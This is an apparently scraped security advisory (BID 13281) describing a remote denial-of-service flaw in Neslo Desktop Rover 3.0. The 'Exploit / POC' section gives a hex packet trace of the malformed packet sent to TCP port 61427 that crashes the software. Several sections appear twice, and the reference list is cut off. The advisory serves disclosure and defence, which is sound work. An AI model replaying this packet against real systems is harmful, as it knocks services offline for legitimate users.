Neslo Desktop Rover Malformed Packet Remote Denial Of Service Vulnerability
BID:13281
Info
Neslo Desktop Rover Malformed Packet Remote Denial Of Service Vulnerability
| Bugtraq ID: | 13281 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 20 2005 12:00AM |
| Updated: | Apr 20 2005 12:00AM |
| Credit: | Discovery of this issue is credited to Adam Baldwin <[email protected]>. |
| Vulnerable: |
Neslo Desktop Rover 3.0 |
| Not Vulnerable: | |
Discussion
Neslo Desktop Rover Malformed Packet Remote Denial Of Service Vulnerability
Neslo Desktop Rover is prone to a remote denial of service. Reports indicate that the software will crash when a malformed packet is processed on TCP port 61427.
A remote attacker may exploit this condition crash the software and effectively deny service for legitimate users.
Neslo Desktop Rover is prone to a remote denial of service. Reports indicate that the software will crash when a malformed packet is processed on TCP port 61427.
A remote attacker may exploit this condition crash the software and effectively deny service for legitimate users.
Exploit / POC
Neslo Desktop Rover Malformed Packet Remote Denial Of Service Vulnerability
The following packet trace is available:
20:23:48.778009 192.168.28.133.32771 > 192.168.28.129.61427: P [tcp sum ok]
1:13(12) ack 1 win 5840 (DF) (ttl 64, id 24051, len 64)
4500 0040 5df3 4000 4006 226e c0a8 1c85
c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa
8018 16d0 daab 0000 0101 080a 0000 8cbe
0000 0000 6352 0100 0000 0000 0000 0000
The following packet trace is available:
20:23:48.778009 192.168.28.133.32771 > 192.168.28.129.61427: P [tcp sum ok]
1:13(12) ack 1 win 5840 (DF) (ttl 64, id 24051, len 64)
4500 0040 5df3 4000 4006 226e c0a8 1c85
c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa
8018 16d0 daab 0000 0101 080a 0000 8cbe
0000 0000 6352 0100 0000 0000 0000 0000
Solution / Fix
Neslo Desktop Rover Malformed Packet Remote Denial Of Service Vulnerability
Solution:
The discoverer of this issue reports that the vendor is intending to address this issue in version 3.1 of the software. This is not confirmed. Customers are advised to contact the vendor for further information.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
The discoverer of this issue reports that the vendor is intending to address this issue in version 3.1 of the software. This is not confirmed. Customers are advised to contact the vendor for further information.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Neslo Desktop Rover Malformed Packet Remote Denial Of Service Vulnerability
References:
References:
- Desktop Rover Homepage (Neslo Software, Inc.)
- Neslo Desktop Rover Remote DoS Vulnerability (Adam Baldwin